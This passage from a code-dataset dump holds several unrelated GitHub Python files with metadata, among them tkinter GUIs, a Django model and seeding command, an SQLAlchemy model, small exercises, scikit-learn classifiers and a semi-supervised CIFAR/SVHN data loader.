Tk()\nwindow.title(\"Flashy\")\nwindow.config(bg=BACKGROUND_COLOR, padx=50, pady=50)\n\nflip_timer = window.after(3000, flip_card)\n\ncanvas = Canvas(width=800, height=526, highlightthickness=0, bg=BACKGROUND_COLOR)\nback_img = PhotoImage(file=\"images/card_back.png\")\nfront_img = PhotoImage(file=\"images/card_front.png\")\ncanvas_image = canvas.create_image(400, 263, image=front_img)\n\nlanguage = canvas.create_text(400, 150, text=\"French\", font=(\"Arial\", 40, \"italic\"))\nquestion = canvas.create_text(400, 283, text=\"SubTitle\", font=(\"Arial\", 60, \"italic\"))\ncanvas.grid(column=0, row=0, columnspan=2)\n\n\nwrong_img = PhotoImage(file=\"images/wrong.png\")\nwrong_button = Button(image=wrong_img, highlightthickness=0, command=next_card)\nwrong_button.grid(column=0, row=1)\n\nright_img = PhotoImage(file=\"images/right.png\")\nright_button = Button(image=right_img, highlightthickness=0, command=is_known)\nright_button.grid(column=1, row=1)\n\nnext_card()\n\nwindow.mainloop()\n\n","repo_name":"NilGamer/flash_card_project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"22862660976","text":"with open('day9/data.txt') as f:\n data = f.readlines()\n\nfor i in range(len(data)-1):\n data[i] = int(data[i][:-1])\n\ndata[len(data)-1] = int(data[len(data)-1])\n\n\nfor i in range(25,len(data)):\n start = i - 25\n end = i - 1\n to_parse = sorted(data[start:end+1])\n lo = 0\n hi = len(to_parse)-1\n while lo <= hi:\n if lo == hi:\n print(data[i])\n break\n else:\n if to_parse[lo]+ to_parse[hi] < data[i]:\n lo+=1\n #print(lo)\n elif to_parse[lo] + to_parse[hi] > data[i]:\n hi-=1\n #print(hi)\n else:\n break\n \n \n","repo_name":"nguyenethan01/advent2020","sub_path":"day9/day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"34737163056","text":"from django.db import models\n\n\nclass AnoContabil(models.Model):\n '''\n A classe AnoContabil serve para registrarmos os anos contábeis.\n Além de fazer as implementações relacionadas a um único ano contábil.\n '''\n\n nome = models.CharField(\n verbose_name='Nome',\n max_length=100\n )\n\n data_inicial = models.DateField(\n verbose_name='Data inicial'\n )\n\n data_final = models.DateField(\n verbose_name='Data final'\n )\n\n aberto = models.BooleanField(\n verbose_name='Aberto?',\n default=False\n )\n\n def __str__(self):\n return self.nome\n\n class Meta:\n app_label = 'financeiro'\n verbose_name = 'Ano contábil'\n verbose_name_plural = 'Anos contábeis'\n","repo_name":"TimeNovaData/app_financeiro","sub_path":"models/ano_contabil.py","file_name":"ano_contabil.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"19096375842","text":"class Solution:\n def largestNumber(self, nums: List[int]) -> str:\n for i,n in enumerate(nums):\n nums[i]=str(n)\n def compare(n1,n2):\n if n1+n2>n2+n1:\n return -1\n else:\n return 1\n nums=sorted(nums,key=cmp_to_key(compare))\n #[0,0,0]=\"000\" must be retured as \"0\" so to do this first we convert it to int then to string\n return str(int(\"\".join(nums)))\n \n \n ","repo_name":"kalebwondimu33/LeetcodeSolutions","sub_path":"0179-largest-number/0179-largest-number.py","file_name":"0179-largest-number.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"8616776099","text":"from django.core.management.base import BaseCommand\nfrom rooms import models as room_models\n\n\nclass Command(BaseCommand):\n\n help = \"This command creates houserules\"\n # def add_arguments(self, parser):\n # parser.add_argument(\"--times\", help=\"how many times\")\n\n def handle(self, *args, **options):\n houserules = [\n \"키패드로 셀프 체크인\",\n \"열쇠 보관함으로 체크인\",\n \"안내 직원(으)로 셀프 체크인\",\n \"흡연 금지\",\n \"반려동물 동반 불가\",\n \"어린이와 유아에게 적합하지 않음\",\n \"파티 또는 이벤트 금지\",\n ]\n\n for r in houserules:\n room_models.HouseRule.objects.create(name=r)\n\n self.stdout.write(self.style.SUCCESS(\"Houserules Created\"))","repo_name":"GisangLee/fullstack_practice","sub_path":"rooms/management/commands/seed_houserules.py","file_name":"seed_houserules.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"34402295712","text":"\nfrom sqlalchemy import Column, Index\nfrom sqlalchemy import String, Integer, Date, DateTime, Float, Numeric, ForeignKey\nfrom sqlalchemy.types import ARRAY, JSON\nfrom sqlalchemy import and_, or_\nfrom sqlalchemy.dialects.postgresql import UUID\n\nfrom sqlalchemy.orm import relationship, backref\n\nfrom openapi_server.models.attr import Attr as AttrApi\n\nfrom backbone_server.model.mixins import Base\nfrom backbone_server.model.study import Study\n\nclass Attr(Base):\n\n\n study_id = Column('study_id',\n UUID(as_uuid=True),\n ForeignKey('study.id'))\n attr_type = Column(String(256), index=True)\n attr_value_str = Column(String(256), index=True)\n attr_value_int = Column(Integer, index=True)\n attr_value_float = Column(Float, index=True)\n attr_value_decimal = Column(Numeric, index=True)\n attr_value_date = Column(Date, index=True)\n attr_value_datetime = Column(DateTime, index=True)\n attr_value_list_int = Column(ARRAY(Integer))\n attr_value_object = Column(JSON)\n attr_source = Column(String(256))\n\n study = relationship('Study',\n backref=backref('attr'))\n\n openapi_class = AttrApi\n\n def submapped_items(self):\n return {\n 'study_name': 'study.name',\n }\n\n @staticmethod\n def get_query(db, api_attr, value_type=None, user=None):\n\n study_id = None\n if not api_attr.attr_value:\n return None\n if value_type:\n value_type = 'attr_value_' + value_type\n else:\n value_type = 'attr_value_' + type(api_attr.attr_value).__name__\n if value_type == 'attr_value_list':\n value_type = value_type + '_' + type(api_attr.attr_value[0]).__name__\n if isinstance(api_attr.attr_value, str):\n import urllib\n api_attr.attr_value = urllib.parse.unquote_plus(api_attr.attr_value)\n\n attr_query = db.query(Attr).filter(and_(Attr.attr_type == api_attr.attr_type,\n Attr.__table__.c[value_type] == api_attr.attr_value))\n if api_attr.attr_source:\n attr_query = attr_query.filter(or_(Attr.attr_source == api_attr.attr_source, Attr.attr_source == None))\n if api_attr.study_name:\n study = Study.get_or_create_study(db, api_attr.study_name, user)\n study_id = study.id\n attr_query = attr_query.filter(or_(Attr.study_id == study_id, Attr.study_id == None))\n\n return attr_query\n\n @staticmethod\n def get(db, api_attr, value_type=None, user=None):\n\n query = Attr.get_query(db, api_attr, value_type, user=user)\n\n if query:\n return query.first()\n return None\n\n @staticmethod\n def get_or_create(db, api_attr, value_type=None, user=None):\n\n attr = Attr.get(db, api_attr, value_type, user=user)\n\n if attr is None:\n study_id = None\n if api_attr.study_name:\n study = Study.get_or_create_study(db, api_attr.study_name, user)\n study_id = study.id\n attr = Attr(attr_type=api_attr.attr_type,\n attr_source=api_attr.attr_source,\n study_id=study_id)\n if not value_type:\n value_type = 'attr_value_' + type(api_attr.attr_value).__name__\n setattr(attr, value_type, api_attr.attr_value)\n db.add(attr)\n db.commit()\n attr = Attr.get(db, api_attr)\n\n return attr\n\n @staticmethod\n def get_all(db, api_attr, value_type=None, user=None):\n\n\n query = Attr.get_query(db, api_attr, value_type, user=user)\n\n if not query:\n return\n\n for attr in query.all():\n yield attr\n\n study = relationship(\"Study\")\n def __repr__(self):\n return f''''''\n\nIndex('idx_attr_index', Attr.attr_type, 
Attr.attr_value_str)\n","repo_name":"malariagen/sims-backbone","sub_path":"server/backbone_server/model/attr.py","file_name":"attr.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
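A heavily hedged usage sketch for the Attr model in the record above. The keyword names are read off get_query/get_or_create; the AttrApi constructor arguments and the open SQLAlchemy session are assumptions for illustration only:

from openapi_server.models.attr import Attr as AttrApi
from backbone_server.model.attr import Attr

# 'session' is assumed to be an open SQLAlchemy session bound to the backbone schema.
api_attr = AttrApi(attr_type='oxford_id', attr_value='OX0001')   # a str value lands in attr_value_str
attr = Attr.get_or_create(session, api_attr)
for hit in Attr.get_all(session, api_attr):
    print(hit.attr_type, hit.attr_value_str)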
+{"seq_id":"34943469917","text":"# coding=utf-8\ndef fibo(n):\n a, b = 0, 1\n while b < n:\n print(b)\n a, b = b, a + b\n print\n\n\ndef fibo2(n):\n result = []\n a, b = 0, 1\n while b < n:\n result.append(b)\n a, b = b, a + b\n return result\n\n\n'''\n一个模块被另一个模块第一次引入 的时候,其主程序将被执行。如果我们想在模块被引入时,模块中的某一个程序块不执行,这时候可以用__name__来使\n该程序仅在自身模块运行时执行。\n每一个模块都有一个__name__属性,当其值是'__main__'时,表明该模块自身在运行,否则是其他模块在引入。\n'''\nif __name__ == '__main__':\n print(\"程序自身运行\")\nelse:\n print(\"我来子另一模块\")\n","repo_name":"zoushiqing/python","sub_path":"基础/fibo.py","file_name":"fibo.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"72994202407","text":"print(\"PygLatin\")\r\n\r\npyg = \"ay\"\r\nasli = input(\"Enter any word: \")\r\nif len(asli) > 0 and asli.isalpha():\r\n word = asli.lower()\r\n first = word[0]\r\n new_word = word[1:]\r\n new_word = new_word + first + pyg\r\n print(new_word)\r\nelse:\r\n print(u\"آپ نے کوئي لفظ درج نہيں کيا ہے۔\")\r\n","repo_name":"yethrosh/Python","sub_path":"PygLatin.py","file_name":"PygLatin.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"13553716958","text":"import pandas as pd\r\ndf= pd.read_csv(\"internship_prediction_based.csv\")\r\n\r\nX = df.iloc[:, [2, 3]].values\r\ny = df.iloc[:, 4].values\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test=train_test_split(X,y,\r\n test_size=.25,random_state=42)\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nms=MinMaxScaler()\r\nx_train=ms.fit_transform(x_train)\r\nx_test=ms.transform(x_test)\r\n\r\nfrom sklearn.svm import SVC\r\nmodel=SVC(kernel='linear',random_state=42)\r\nmodel.fit(x_train,y_train)\r\ny_pred=model.predict(x_test)\r\n\r\nfrom sklearn.metrics import accuracy_score\r\nprint(\"Linear Accuracy: \",accuracy_score(y_test,y_pred))\r\n\r\nmodel=SVC(kernel='rbf',random_state=42)\r\nmodel.fit(x_train,y_train)\r\ny_pred=model.predict(x_test)\r\n\r\nfrom sklearn.metrics import accuracy_score\r\nprint(\"RBF Accuracy: \",accuracy_score(y_test,y_pred))\r\n\r\nmodel=SVC(kernel='poly',random_state=42)\r\nmodel.fit(x_train,y_train)\r\ny_pred=model.predict(x_test)\r\n\r\nfrom sklearn.metrics import accuracy_score\r\nprint(\"Poly Accuracy: \",accuracy_score(y_test,y_pred))\r\n\r\nmodel=SVC(kernel='sigmoid',random_state=42)\r\nmodel.fit(x_train,y_train)\r\ny_pred=model.predict(x_test)\r\n\r\nfrom sklearn.metrics import accuracy_score\r\nprint(\"Sigmoid Accuracy: \",accuracy_score(y_test,y_pred))\r\n\r\nfrom sklearn.naive_bayes import GaussianNB\r\ngb=GaussianNB()\r\ngb.fit(x_train,y_train)\r\ny_pred=gb.predict(x_test)\r\nfrom sklearn.metrics import accuracy_score\r\nprint(\"NB accuracy=\",accuracy_score(y_test,y_pred))","repo_name":"Bose-info/internship_prediction_based-ML-project","sub_path":"internship_prediction_based.py","file_name":"internship_prediction_based.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"34177411652","text":"from torchvision.datasets import CIFAR10, CIFAR100, SVHN\nfrom torch.utils.data import Sampler, Dataset\nfrom torchvision import transforms\nimport torch\nimport numpy as np\n\nimport os\nimport pickle\nimport pdb\n\nimport logging\n\nfrom hashlib import md5\n\nDATASETS = ['cifar10', 'svhn']\n\n\nclass SemiSupervisedDataset(Dataset):\n def __init__(self,\n base_dataset='cifar10',\n downsample=1,\n take_fraction=None,\n take_amount_seed=1,\n semisupervised=False,\n sup_labels=None,\n unsup_labels=None,\n test_labels=None,\n add_cifar100=False,\n add_svhn_extra=False,\n aux_data_filename=None,\n aux_targets_filename=None,\n add_aux_labels=False,\n aux_take_amount=None,\n aux_label_noise=None,\n train=False,\n **kwargs):\n\n if base_dataset == 'cifar10':\n self.dataset = CIFAR10(train=train, **kwargs)\n elif base_dataset == 'svhn':\n if train:\n self.dataset = SVHN(split='train', **kwargs)\n else:\n self.dataset = SVHN(split='test', **kwargs)\n # because torchvision is annoying\n self.dataset.targets = self.dataset.labels\n self.targets = list(self.targets)\n\n if train and add_svhn_extra:\n svhn_extra = SVHN(split='extra', **kwargs)\n self.data = np.concatenate([self.data, svhn_extra.data])\n self.targets.extend(svhn_extra.labels)\n else:\n raise ValueError('Dataset %s not supported' % base_dataset)\n self.base_dataset = base_dataset\n self.train = train\n self.transform = self.dataset.transform\n\n if self.train:\n # Collecting subset of train data with relevant labels\n if sup_labels is not None:\n self.sup_indices = [i for (i, label) in enumerate(self.targets)\n if label in sup_labels]\n else:\n self.sup_indices = np.arange(len(self.targets))\n sup_labels = range(max(self.targets) + 1)\n\n # Collecting subset of train data with relevant labels\n if unsup_labels is not None:\n self.unsup_indices = [i for (i, label) in\n enumerate(self.targets)\n if label in unsup_labels]\n else:\n self.unsup_indices = np.arange(len(self.targets))\n\n self.sup_indices = self.sup_indices[::downsample]\n if take_fraction is not None:\n rng_state = np.random.get_state()\n np.random.seed(take_amount_seed)\n take_inds = np.random.choice(len(self.sup_indices),\n int(take_fraction*len(self.sup_indices)),\n replace=False)\n np.random.set_state(rng_state)\n\n logger = logging.getLogger()\n logger.info('Randomly taking only %d/%d examples from training'\n ' set, seed=%d, indices=%s',\n take_fraction*len(self.sup_indices), len(self.sup_indices),\n take_amount_seed, take_inds)\n self.sup_indices = self.sup_indices[take_inds]\n\n self.unsup_indices = list(set(self.unsup_indices)\n - set(self.sup_indices))\n\n if semisupervised:\n labeled = [self.targets[i] for i in self.sup_indices]\n labeled = [sup_labels.index(i) for i in labeled]\n unlabeled = [-1] * len(self.unsup_indices)\n self.targets = labeled + unlabeled\n self.data = np.concatenate((self.data[self.sup_indices],\n self.data[self.unsup_indices]),\n axis=0)\n self.sup_indices = list(range(len(self.sup_indices)))\n self.unsup_indices = list(\n range(len(self.sup_indices),\n len(self.sup_indices)+len(self.unsup_indices)))\n # self.train_labels = [\n # label if i % downsample == 0 else -1\n # for (i, label) in enumerate(self.train_labels)]\n else:\n self.all_targets = np.copy(self.targets)\n self.all_data = np.copy(self.data)\n self.targets = [self.targets[i] for i in self.sup_indices]\n self.targets = [sup_labels.index(i) for i in self.targets]\n self.data = self.data[self.sup_indices, ...]\n self.sup_indices = 
list(range(len(self.sup_indices)))\n\n self.orig_len = len(self.data)\n if add_cifar100:\n orig_len = len(self.data)\n cifar100 = CIFAR100(**kwargs)\n self.data = np.concatenate((self.data, cifar100.data), axis=0)\n self.targets.extend([-1] * len(cifar100.targets))\n self.unsup_indices.extend(\n range(orig_len, orig_len + len(cifar100)))\n\n if aux_data_filename is not None:\n aux_path = os.path.join(kwargs['root'], aux_data_filename)\n print(\"Loading data from %s\" % aux_path)\n with open(aux_path, 'rb') as f:\n aux = pickle.load(f)\n aux_data = aux['data']\n aux_targets = aux['extrapolated_targets']\n orig_len = len(self.data)\n\n if aux_take_amount is not None:\n rng_state = np.random.get_state()\n np.random.seed(take_amount_seed)\n take_inds = np.random.choice(len(aux_data),\n aux_take_amount, replace=False)\n np.random.set_state(rng_state)\n\n logger = logging.getLogger()\n logger.info(\n 'Randomly taking only %d/%d examples from aux data'\n ' set, seed=%d, indices=%s',\n aux_take_amount, len(aux_data),\n take_amount_seed, take_inds)\n aux_data = aux_data[take_inds]\n aux_targets = aux_targets[take_inds]\n\n if not add_aux_labels:\n self.targets.extend([-1] * len(aux_data))\n else:\n if aux_targets_filename is not None:\n aux_path = aux_targets_filename\n print(\"Loading data from %s\" % aux_path)\n with open(aux_path, 'rb') as f:\n aux = pickle.load(f)\n new_aux_targets = aux['extrapolated_targets']\n n = len(aux_targets)\n print('Difference between new and old extrapolated targets = %.3g%%' %\n (100 * (aux_targets != new_aux_targets[:n]).mean()))\n\n if (len(new_aux_targets) > len(aux_targets)):\n assert(len(new_aux_targets) - len(aux_targets) == len(self.unsup_indices))\n true_labels = [self.all_targets[i] for i in self.unsup_indices]\n print('Difference between extrapolated and true labels on training set = %.3g%%' %\n (100 * (true_labels != new_aux_targets[n:]).mean()))\n logging.info('Adding unsupervised %d examples from training data' %(len(self.unsup_indices)))\n unlabeled_data = self.all_data[self.unsup_indices]\n # Since new targets are now included\n self.unsup_indices = []\n aux_data = np.concatenate((aux_data, unlabeled_data), axis=0)\n aux_targets = new_aux_targets\n\n else:\n self.unsup_indices=[]\n if aux_label_noise:\n num_aux = len(aux_targets)\n num_to_noise = int(num_aux * aux_label_noise)\n logging.info('Making %d/%d aux labels noisy, '\n 'numpy rng state MD5=%s' %\n (num_to_noise, num_aux,\n md5(np.random.get_state()[1]).hexdigest()\n ))\n inds_to_noise = np.random.choice(\n num_aux, num_to_noise, replace=False)\n permutated_labels = np.random.permutation(\n aux_targets[inds_to_noise])\n aux_targets[inds_to_noise] = permutated_labels\n\n self.targets.extend(aux_targets)\n self.data = np.concatenate((self.data, aux_data), axis=0)\n # note that we use unsup indices to track the labeled datapoints\n # whose labels are \"fake\"\n self.unsup_indices.extend(\n range(orig_len, orig_len+len(aux_data)))\n\n self.orig_len = orig_len\n logger = logging.getLogger()\n logger.info(\"Training set\")\n logger.info(\"Number of training samples: %d\", len(self.targets))\n logger.info(\"Number of supervised samples: %d\",\n len(self.sup_indices))\n logger.info(\"Number of unsup samples: %d\", len(self.unsup_indices))\n logger.info(\"Label histogram: %s\",\n tuple(\n zip(*np.unique(self.targets, return_counts=True))))\n logger.info(\"Shape of training data: %s\", np.shape(self.data))\n\n # Test set\n else:\n self.orig_len = len(self.data)\n if test_labels is not None:\n 
self.test_indices = [i for (i, label) in enumerate(self.targets)\n if label in test_labels]\n self.targets = [self.targets[i] for i in self.test_indices]\n self.targets = [test_labels.index(i) for i in self.targets]\n self.data = self.data[self.test_indices, ...]\n self.orig_len = len(self.data)\n logger = logging.getLogger()\n logger.info(\"Test set\")\n logger.info(\"Number of samples: %d\", len(self.targets))\n logger.info(\"Label histogram: %s\",\n tuple(\n zip(*np.unique(self.targets, return_counts=True))))\n logger.info(\"Shape of data: %s\", np.shape(self.data))\n\n @property\n def data(self):\n return self.dataset.data\n\n @data.setter\n def data(self, value):\n self.dataset.data = value\n\n @property\n def targets(self):\n return self.dataset.targets\n\n @targets.setter\n def targets(self, value):\n self.dataset.targets = value\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, item):\n self.dataset.labels = self.targets # because torchvision is annoying\n d = self.dataset[item]\n d = list(d)\n d.append(item >= self.orig_len)\n d = tuple(d)\n return d\n # return self.dataset[item]\n\n\n def __repr__(self):\n fmt_str = 'Semisupervised Dataset ' + self.__class__.__name__ + '\\n'\n fmt_str += ' Number of datapoints: {}\\n'.format(self.__len__())\n fmt_str += ' Training: {}\\n'.format(self.train)\n fmt_str += ' Root Location: {}\\n'.format(self.dataset.root)\n tmp = ' Transforms (if any): '\n fmt_str += '{0}{1}\\n'.format(tmp, self.dataset.transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\n tmp = ' Target Transforms (if any): '\n fmt_str += '{0}{1}'.format(tmp, self.dataset.target_transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\n return fmt_str\n\n\nclass SemiSupervisedSampler(Sampler):\n def __init__(self, sup_inds, unsup_inds, batch_size, unsup_fraction=0.5,\n num_batches=None):\n if unsup_fraction is None or unsup_fraction < 0:\n self.sup_inds = sup_inds + unsup_inds\n unsup_fraction = 0.0\n else:\n self.sup_inds = sup_inds\n self.unsup_inds = unsup_inds\n\n self.batch_size = batch_size\n unsup_batch_size = int(batch_size * unsup_fraction)\n self.sup_batch_size = batch_size - unsup_batch_size\n\n if num_batches is not None:\n self.num_batches = num_batches\n else:\n self.num_batches = int(\n np.ceil(len(self.sup_inds) / self.sup_batch_size))\n\n\n super().__init__(None)\n\n def __iter__(self):\n batch_counter = 0\n while batch_counter < self.num_batches:\n sup_inds_shuffled = [self.sup_inds[i]\n for i in torch.randperm(len(self.sup_inds))]\n for sup_k in range(0, len(self.sup_inds), self.sup_batch_size):\n if batch_counter == self.num_batches:\n break\n batch = sup_inds_shuffled[sup_k:(sup_k + self.sup_batch_size)]\n # extending with unlabeled data\n if self.sup_batch_size < self.batch_size:\n batch.extend([self.unsup_inds[i] for i in\n torch.randint(high=len(self.unsup_inds),\n size=(\n self.batch_size - len(\n batch),),\n dtype=torch.int64)])\n\n np.random.shuffle(batch)\n yield batch\n batch_counter += 1\n\n def __len__(self):\n return self.num_batches\n","repo_name":"p-lambda/robust_tradeoff","sub_path":"cifar/code/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":14058,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"}
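A heavily hedged construction sketch for the dataset/sampler pair in the record above. The keyword names are read off the two __init__ signatures; root/download/transform are placeholder values forwarded to torchvision's CIFAR10, and unsup_fraction=None simply folds every index into the supervised pool for batching:

from torch.utils.data import DataLoader
from torchvision import transforms

ds = SemiSupervisedDataset(base_dataset='cifar10', train=True,
                           root='./data', download=True,
                           transform=transforms.ToTensor())
sampler = SemiSupervisedSampler(ds.sup_indices, ds.unsup_indices,
                                batch_size=128, unsup_fraction=None)
loader = DataLoader(ds, batch_sampler=sampler)   # the sampler yields whole batches of indices
for images, targets, is_aux in loader:
    break   # each item carries the "came from aux data" flag appended in __getitem__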
+{"seq_id":"34422995266","text":"# Gerar executável para windows\n\n# pip install pyinstaller\n\n# pyinstaller --onefile tela.py --noconsole\n\nimport tela_support\nimport sys\nimport tkinter as tk\nimport tkinter.ttk as ttk\nfrom tkinter.constants import *\nimport os.path\n\n_script = sys.argv[0]\n_location = os.path.dirname(_script)\n\n\n_bgcolor = '#d9d9d9' # X11 color: 'gray85'\n_fgcolor = '#000000' # X11 color: 'black'\n_compcolor = 'gray40' # X11 color: #666666\n_ana1color = '#c3c3c3' # Closest X11 color: 'gray76'\n_ana2color = 'beige' # X11 color: #f5f5dc\n_tabfg1 = 'black'\n_tabfg2 = 'black'\n_tabbg1 = 'grey75'\n_tabbg2 = 'grey89'\n_bgmode = 'light'\n\n\nclass Toplevel1:\n\n def calcular(self):\n altura = float(self.altura.get())\n raio = float(self.diametro.get())/2\n area = round(3.14*raio**2*altura)\n self.Label3_3.configure(text='Volume: '+str(area)+\" m²\")\n\n def __init__(self, top=None):\n '''This class configures and populates the toplevel window.\n top is the toplevel containing window.'''\n\n top.geometry(\"1327x711+114+137\")\n top.minsize(120, 1)\n top.maxsize(1924, 1061)\n top.resizable(1, 1)\n top.title(\"Toplevel 0\")\n top.configure(background=\"#2e3349\")\n top.configure(highlightbackground=\"#d9d9d9\")\n top.configure(highlightcolor=\"black\")\n\n self.top = top\n self.altura = tk.StringVar()\n self.diametro = tk.StringVar()\n\n self.menubar = tk.Menu(top, font=\"TkMenuFont\",\n bg=_bgcolor, fg=_fgcolor)\n top.configure(menu=self.menubar)\n\n self.Label1 = tk.Label(self.top)\n self.Label1.place(relx=0.588, rely=-0.042, height=886, width=1167)\n self.Label1.configure(activebackground=\"#f9f9f9\")\n self.Label1.configure(anchor='w')\n self.Label1.configure(background=\"#2e3349\")\n self.Label1.configure(compound='left')\n self.Label1.configure(disabledforeground=\"#a3a3a3\")\n self.Label1.configure(foreground=\"#000000\")\n self.Label1.configure(highlightbackground=\"#d9d9d9\")\n self.Label1.configure(highlightcolor=\"black\")\n photo_location = os.path.join(\n _location, \"D:/GitHub/puc_minas_iot_industrial_programacao_para_desenvolvimento_iiot/aula3/imagens/tanque.png\")\n global _img0\n _img0 = tk.PhotoImage(file=photo_location)\n self.Label1.configure(image=_img0)\n\n self.Frame1 = tk.Frame(self.top)\n self.Frame1.place(relx=0.039, rely=0.239,\n relheight=0.726, relwidth=0.529)\n self.Frame1.configure(relief='groove')\n self.Frame1.configure(borderwidth=\"2\")\n self.Frame1.configure(relief=\"groove\")\n self.Frame1.configure(background=\"#252a40\")\n self.Frame1.configure(highlightbackground=\"#d9d9d9\")\n self.Frame1.configure(highlightcolor=\"black\")\n\n self.Label3 = tk.Label(self.Frame1)\n self.Label3.place(relx=0.148, rely=0.128, height=79, width=166)\n self.Label3.configure(activebackground=\"#f9f9f9\")\n self.Label3.configure(anchor='w')\n self.Label3.configure(background=\"#252a40\")\n self.Label3.configure(compound='left')\n self.Label3.configure(disabledforeground=\"#a3a3a3\")\n self.Label3.configure(font=\"-family {Segoe UI} -size 22\")\n self.Label3.configure(foreground=\"#f2f2f2\")\n self.Label3.configure(highlightbackground=\"#d9d9d9\")\n self.Label3.configure(highlightcolor=\"black\")\n self.Label3.configure(text='''Altura [m]:''')\n\n self.Button1 = tk.Button(self.Frame1)\n self.Button1.place(relx=0.252, rely=0.734, height=74, width=307)\n self.Button1.configure(activebackground=\"beige\")\n self.Button1.configure(activeforeground=\"black\")\n self.Button1.configure(background=\"#007ef9\")\n self.Button1.configure(compound='left')\n 
self.Button1.configure(disabledforeground=\"#a3a3a3\")\n self.Button1.configure(font=\"-family {Segoe UI} -size 28 -weight bold\")\n self.Button1.configure(foreground=\"#f2f2f2\")\n self.Button1.configure(highlightbackground=\"#d9d9d9\")\n self.Button1.configure(highlightcolor=\"black\")\n self.Button1.configure(pady=\"0\")\n self.Button1.configure(text='''Alterar''')\n\n self.Entry1 = tk.Entry(self.Frame1)\n self.Entry1.place(relx=0.415, rely=0.128, height=60, relwidth=0.348)\n self.Entry1.configure(background=\"white\")\n self.Entry1.configure(disabledforeground=\"#a3a3a3\")\n self.Entry1.configure(font=\"-family {Courier New} -size 20\")\n self.Entry1.configure(foreground=\"#000000\")\n self.Entry1.configure(highlightbackground=\"#d9d9d9\")\n self.Entry1.configure(highlightcolor=\"black\")\n self.Entry1.configure(insertbackground=\"black\")\n self.Entry1.configure(selectbackground=\"#c4c4c4\")\n self.Entry1.configure(selectforeground=\"black\")\n self.Entry1.configure(textvariable=self.altura)\n\n self.Entry2 = tk.Entry(self.Frame1)\n self.Entry2.place(relx=0.415, rely=0.388, height=60, relwidth=0.348)\n self.Entry2.configure(background=\"white\")\n self.Entry2.configure(disabledforeground=\"#a3a3a3\")\n self.Entry2.configure(font=\"-family {Courier New} -size 20\")\n self.Entry2.configure(foreground=\"#000000\")\n self.Entry2.configure(highlightbackground=\"#d9d9d9\")\n self.Entry2.configure(highlightcolor=\"black\")\n self.Entry2.configure(insertbackground=\"black\")\n self.Entry2.configure(selectbackground=\"#c4c4c4\")\n self.Entry2.configure(selectforeground=\"black\")\n self.Entry2.configure(textvariable=self.diametro)\n\n self.Label3_1 = tk.Label(self.Frame1)\n self.Label3_1.place(relx=0.452, rely=-0.252, height=78, width=165)\n self.Label3_1.configure(activebackground=\"#f9f9f9\")\n self.Label3_1.configure(anchor='w')\n self.Label3_1.configure(background=\"#252a40\")\n self.Label3_1.configure(compound='left')\n self.Label3_1.configure(disabledforeground=\"#a3a3a3\")\n self.Label3_1.configure(font=\"-family {Segoe UI} -size 22\")\n self.Label3_1.configure(foreground=\"#f2f2f2\")\n self.Label3_1.configure(highlightbackground=\"#d9d9d9\")\n self.Label3_1.configure(highlightcolor=\"black\")\n self.Label3_1.configure(text='''Diâmetro [m]:''')\n\n self.Label3_2 = tk.Label(self.Frame1)\n self.Label3_2.place(relx=0.145, rely=0.368, height=79, width=167)\n self.Label3_2.configure(activebackground=\"#f9f9f9\")\n self.Label3_2.configure(anchor='w')\n self.Label3_2.configure(background=\"#252a40\")\n self.Label3_2.configure(compound='left')\n self.Label3_2.configure(disabledforeground=\"#a3a3a3\")\n self.Label3_2.configure(font=\"-family {Segoe UI} -size 22\")\n self.Label3_2.configure(foreground=\"#f2f2f2\")\n self.Label3_2.configure(highlightbackground=\"#d9d9d9\")\n self.Label3_2.configure(highlightcolor=\"black\")\n self.Label3_2.configure(text='''Diâmetro [m]:''')\n\n self.Label2 = tk.Label(self.top)\n self.Label2.place(relx=0.039, rely=0.068, height=74, width=702)\n self.Label2.configure(activebackground=\"#f9f9f9\")\n self.Label2.configure(anchor='w')\n self.Label2.configure(background=\"#f2f2f2\")\n self.Label2.configure(compound='center')\n self.Label2.configure(disabledforeground=\"#a3a3a3\")\n self.Label2.configure(font=\"-family {Segoe UI} -size 36 -weight bold\")\n self.Label2.configure(foreground=\"#007ef9\")\n self.Label2.configure(highlightbackground=\"#d9d9d9\")\n self.Label2.configure(highlightcolor=\"black\")\n self.Label2.configure(text='''Cálculo do volume''')\n\n 
